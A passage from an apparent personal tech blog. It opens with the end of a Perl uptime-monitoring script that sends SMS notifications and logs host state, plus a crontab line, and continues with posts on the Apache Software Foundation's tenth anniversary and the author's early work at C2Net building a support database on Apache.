	if ( !$result ) {

		# Twitter has failed us,
		# need to get the word out still...
		smsEmail ( $msg );

	}

}

sub smsEmail ($) {

	my ( $msg ) = @_;
	my $to = "7735551234\@txt.exaple.org";
	my $from = "pdw\@weinstein.org";
	my $subject = "Service Notification";

	my $sendmail = '/usr/lib/sendmail';
	open(MAIL, "|$sendmail -oi -t");
		print MAIL "From: $from\n";
		print MAIL "To: $to\n";
		print MAIL "Subject: $subject\n\n";
 		print MAIL $msg;
	close( MAIL );

}

sub logState ($$$) {

	my ( $host, $state, $time ) = @_;

	# Create a filehandle on our log file
	my $fh = FileHandle->new(">> $fileLoc");
	if (defined $fh) {

	        # Print to file the necessary information,
                # delimited with a colon
		print $fh "$host:$state:" .$time->datetime. "\n";
		$fh->close;
 	}
}

sub getPreviousState ($) {

	my ( $host ) = @_;

	# For each node in the array do the following
	foreach ( @hostStates ) {

		my( $line ) = $_;
		# Break up the information using our delimiter, 
                # the colon
		my ($domain, $state, $time) = split(/:/, $line, 3);

		# If we find our site return the previous state
		if ( $domain eq $host ) {

			return $state;

		}

 	}

}
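
With the script saved somewhere sensible, a crontab entry along the following lines will run the monitor every five minutes; the script path and the interval here are assumptions to adjust as needed:


*/5 * * * * /usr/local/bin/monitor.pl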

Happy Birthday Apache (Software Foundation)


First published: 3rd of November 2009 for Technorati

 

 

(Photo from Flickr user jaaronfarr)


This week the Apache Software Foundation (ASF) is holding its annual US conference in Northern California for all things Apache. As part of the get-together, conference attendees, as well as those elsewhere this week, are invited to join in celebrating the 10th anniversary of The Apache Software Foundation.

Ah, I hear confusion in your voice, didn't Apache celebrate its 10th anniversary a couple of years ago?

Indeed the Apache Web Server has already celebrated its tenth birthday, but just as the Apache Web Server evolved from an ad hoc collection of software patches for the NCSA's HTTPd web server, the Apache Software Foundation is a registered not-for-profit organization that evolved from the loose affiliation of web developers and administrators who submitted and organized those patches in the first place.

Big deal? Well, yes - it is a big deal. See, the Apache Software Foundation is a decentralized community of developers that oversees the development of the Apache HTTP Server along with some 65 additional leading open source projects.

In essence the ASF provides the necessary framework for those projects to exist: guidelines on how to organize project resources and contributions, a maturation process for new projects known as the Apache Incubator, legal protection for volunteers, defense against misuse of the Apache brand name and adoption of the Apache License.

In other words, the ASF is about learning from and building on the success of the world's most popular web server. Projects such as Tomcat, Lucene, SpamAssassin and CouchDB all owe a bit of their success to the ASF's dedication to providing transparent, team-focused development projects with the computing and project resources needed for successful collaboration.

Along with the same open source license and resources, the projects managed by the ASF - and to a larger extent the collection of project volunteers - share a set of ideals: project participation helps define not just the roles of individual contributors, but their responsibilities as well. Roles are assigned based upon demonstrated talent and ability, a meritocracy. And while anyone can contribute to a project outright, membership in the foundation as a whole is granted only to nominated and elected individuals who have actively contributed to the ASF and its projects.

Oh, and the ASF also organizes several ApacheCon conferences each year, including annual conferences in the United States and Europe.

And that is why the ASF's 10th anniversary is important. That is why you should take some time this week to celebrate.

(Ed. note: this author also reflects on his first time with Apache on his personal blog.)

My First Exposure to Apache, A Personal Reflection


Technorati just published an article of mine on this week's 10th Anniversary celebration of the Apache Software Foundation. Alas, given current commitments - consulting gigs and an upcoming family getaway - I couldn't justify a trip out to the Bay Area this week to participate. So instead, I present this personal reflection on my first real exposure to Apache in celebration of the foundation's 10-year milestone.

C2Net Software
In 1998, with a freshly minted Computer Science degree in hand, I received my first real exposure to the Apache community with my first full-time job offer from C2Net Software in Oakland, CA. I had an offer sheet, a signing bonus and an opportunity to move to the technological epicenter that is the San Francisco Bay Area. I had no idea what I was in for.

By 1998 the Apache Group - forerunner to the Apache Software Foundation - had already coalesced around a patched-up HTTPd web server from the University of Illinois' National Center for Supercomputing Applications, which had come into its own as the most popular software for running websites. Companies such as C2Net and Covalent started building businesses on packaging the Apache Web Server with pre-compiled modules such as mod_php and mod_ssl for any computing platform imaginable, even Windows. But by far the most popular systems of the day were Sun - We put the dot in dot-com - Solaris and FreeBSD.


The Internet boom was in full swing.


Being a recent college graduate I had all of the theory and knowledge and none of the "real-world" experience. I was hired by C2Net as a Database Engineer. I had recent exposure to various Unix-based systems, including one variation while working for a small business in a Chicago suburb writing Perl scripts for text processing of information bound for a database and later computation. I had experience with HTML layout and programming for the Common Gateway Interface from working part-time at a small computer bookstore in another suburb. I had even tried to organize an online resume matching service as a whole-class project in a Software Engineering course.


However, I was missing two important pieces: knowledge of web server software and how to use the server to bring everything together.


That would soon change. C2Net had been growing. What had started, in part, in a Berkeley dorm as a Bay Area ISP that had adopted the open Apache Web Server to combat security flaws discovered within Netscape's Web Server had evolved into a booming business selling a security-minded version of Apache packaged as the Stronghold Web Server worldwide. Alas, their one-table incident tracking system that had been hacked together one evening was in serious need of replacement.


That is where I came in. Working with three other individuals, I helped develop what is nowadays referred to as a Customer Relationship Management (CRM) system, but at the time we just called it the "All-Singing-All-Dancing Sales and Support Database" - complete with Michigan J. Frog as mascot - since it would integrate sales and support contacts and interactions into a single database with web-based work queues for pending sales and support email inquiries.


ASAD: The All-Singing, All-Dancing Database

Our in-house email and web-based CRM system started by replicating the basic functions of the existing incident tracking system: an inbound email would be parsed and processed based on basic information. If an incident id was located in the subject, the email body was "appended" to the corresponding incident and the status of the incident was updated for attention. If the email had no incident number, a new incident was created, the email was appended and the incident was assigned to a level-one support tech based on the number of open incidents then awaiting any one tech to answer.


Staff members logged into the system using a digital client certificate generated by an internal, private certificate authority. Stronghold would verify the certificate against the root certificate of our certificate authority and then provide the certificate information to the web application. The application would then use the email address as presented in the certificate to query the database and generate the user's work queue. And since using digital certificates begets encryption, all information transmitted between the server and the client was kept confidential from the very beginning to the very end.


Granted, the system had its flaws too. Today there are any number of robust templating systems for abstracting application logic from display logic; back then, many of the program files became filled with dead weight, print statements repeating the same HTML formatting and display code over and over.


But it worked. It was something more than a collection of CGI scripts and static HTML pages on some remote system. It was an application. An application capable of complex user interactions. An application on a system that I had direct access to, where I could review error logs in real time and tweak the performance, and before long a system that would be put to work getting important business done.


All of which came about in great part because of the Apache Web Server and its growing community.

About the Author

Paul is a technologist and all-around nice guy for technology-oriented organizations and parties. Besides this blog and website, Paul's particular pontifications on Life, the Universe and Everything can be followed on Twitter.

   
   

